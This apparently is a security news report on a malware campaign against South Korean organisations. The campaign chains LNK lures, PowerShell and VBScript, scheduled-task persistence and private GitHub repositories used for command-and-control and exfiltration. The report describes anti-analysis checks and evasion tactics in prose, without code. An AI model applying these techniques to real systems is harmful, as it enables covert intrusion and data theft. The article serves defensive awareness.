Hackers are abusing Windows shortcut files and GitHub to run a stealthy, multi‑stage malware campaign against organizations in South Korea.
The operation chains LNK files, PowerShell, and GitHub APIs to deliver surveillance tools while blending into normal enterprise traffic.The campaign begins with weaponized LNK files that contain hidden scripts instead of simple shortcuts.
These older samples exposed rich metadata including recurring file names, sizes, and “Hangul Document” labels a pattern often linked with North Korea–aligned groups such as Kimsuky, APT37, and Lazarus.
Over time, the operators upgraded their tooling by adding simple decoding functions and hard‑encoding payloads directly into the LNK arguments.
When victims open the lure, a legitimate‑looking PDF aligned with Korean business themes appears, while the PowerShell code executes silently in the background.
Earlier waves observed since 2024 used basic string concatenation to obscure a GitHub C2 URL and an access token according to FortiGuard Labs.
GitHub-Backed Malware
The decoded PowerShell script first checks whether it is running in a lab by scanning for virtualization, debugging, and forensic tools, including VMware, VirtualBox, IDA, dnSpy, Wireshark, Fiddler, x64dbg, and Process Hacker processes.
If any of these are found, the script exits immediately, blocking analysts from observing later stages. When no analysis tools are detected, the script reconstructs Base64‑encoded strings and writes a VBScript payload into a randomly named folder under %Temp%.
To survive reboots, the malware registers a hidden Scheduled Task that runs the VBScript every 30 minutes using wscript.exe, with a long, document‑like task name designed to blend into legitimate entries.
The newest variants strip nearly all identifying metadata and keep only a decoder, p1, which takes a file path, length, and XOR key to unpack both a decoy PDF and the next‑stage PowerShell script.
This VBScript in turn re‑launches the PowerShell payload in a hidden window, ensuring ongoing execution with minimal user visibility.
The script also collects detailed host data OS version, build, last boot time, and process list and logs it in files named <timestamp>-<IP>-BEGIN.log before uploading them to a GitHub repository via the API using a hardcoded access token.
Researchers traced these uploads to a GitHub user “motoralis,” whose private repositories and contribution history line up with spikes in LNK‑based phishing activity observed since 2025.
Additional usernames, including God0808RAMA, Pigresy80, entire73, pandora0009, and brandonleeodd93-blip, appear to form a wider infrastructure mix of dormant and newly created accounts.
While some accounts stay quiet for months, others activate briefly to provide backup channels, making the C2 layer resilient against takedowns.
Because all payloads and logs are stored in private GitHub repositories, defenders cannot inspect them directly, yet the traffic still looks like normal encrypted GitHub activity often allowed in corporate networks.
This mirrors a broader trend of threat actors hijacking trusted public platforms from developer services to file‑sharing tools to host malware and exfiltrate data while evading URL and domain‑based blocking.
Final stage: continuous GitHub control
In the third stage, a simpler PowerShell component focuses on keeping a live connection with the GitHub‑hosted C2.
It regularly pulls commands or additional modules from a raw GitHub file path under the motoralis repository, using the Scheduled Task created earlier as its heartbeat.
A dedicated “keep‑alive” script also gathers live network configuration data and pushes it back to GitHub with the PUT method, saving logs under paths formatted as <Date>_<Time>-<IP>-Real.log.
By chaining LNK shortcuts, native Windows scripting (PowerShell and VBScript), Scheduled Tasks, and GitHub APIs, the attackers avoid traditional executable droppers and reduce their on‑disk footprint.
Security teams are advised to treat unexpected LNK and document files with caution, tighten monitoring around PowerShell and wscript activity, and baseline GitHub usage to spot unusual API calls or access patterns.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
